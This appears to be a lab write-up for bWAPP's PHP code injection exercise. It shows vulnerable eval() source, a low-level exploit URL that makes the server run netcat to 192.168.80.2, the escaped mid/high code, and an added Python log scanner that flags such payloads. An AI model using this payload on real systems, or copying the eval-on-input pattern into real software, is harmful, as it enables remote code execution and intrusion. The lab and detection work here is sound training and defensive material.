bWAPP--PHP Code Injection

<?php

if(isset($_REQUEST["message"]))
{

    // If the security level is not MEDIUM or HIGH
    if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2")
    {

?>
    <p><i><?php @eval ("echo " . $_REQUEST["message"] . ";");?></i></p>

  • low

    http://127.0.0.1/phpi.php?message=exec("nc 192.168.80.2 4444")
    
  • mid/high

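    Cannot be bypassed: at these levels the input is never passed to eval(); it is only echoed through htmlspecialchars().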

    <?php
    
        }
    
        // If the security level is MEDIUM or HIGH
        else
        {
    ?>
        <p><i><?php echo htmlspecialchars($_REQUEST["message"], ENT_QUOTES, "UTF-8");;?></i></p>
    
    <?php
    
        }
    
    }
    
    ?>
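
A detection-side check for the low-level case above, added here as an example and not part of the original post or of bWAPP: it scans web server access-log lines for requests whose message parameter decodes to PHP call syntax. The log lines are constructed samples in combined log format, and the function name, client address and patterns are assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristic patterns (assumed for this example) for a parameter that should
# only ever carry display text: PHP call syntax, backticks, statement separators.
SUSPICIOUS = (
    re.compile(r"[A-Za-z_][A-Za-z0-9_]*\s*\("),  # identifier followed by "("
    re.compile(r"`"),                            # backtick shell execution
    re.compile(r";"),                            # would terminate the "echo" statement
)

# Request line inside a combined-format log entry: "METHOD target HTTP/x.y"
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; the flagged value is the request shown on this page.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /phpi.php?message=test HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2020:10:00:05 +0000] "GET /phpi.php?message=exec(%22nc%20192.168.80.2%204444%22) HTTP/1.1" 200 498',
    '192.0.2.10 - - [01/Jan/2020:10:00:09 +0000] "GET /phpi.php?message=hello+world HTTP/1.1" 200 520',
    '192.0.2.10 - - [01/Jan/2020:10:00:12 +0000] "GET /phpi.php?message=exec%28%22nc%20192.168.80.2%204444%22%29 HTTP/1.1" 200 498',
]


def flag_code_injection(log_lines, param="message"):
    """Return (line_number, decoded_value) for requests whose `param` looks like PHP code."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue  # not a parseable request line
        query = urlsplit(m.group(1)).query
        # parse_qsl percent-decodes, so encoded parentheses are matched too
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == param and any(p.search(value) for p in SUSPICIOUS):
                hits.append((n, value))
    return hits


if __name__ == "__main__":
    for n, value in flag_code_injection(SAMPLE_LOG):
        print(f"line {n}: suspicious message value: {value!r}")
```

Access logs record only the query string, so a message value sent in a POST body is not visible to this check.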
    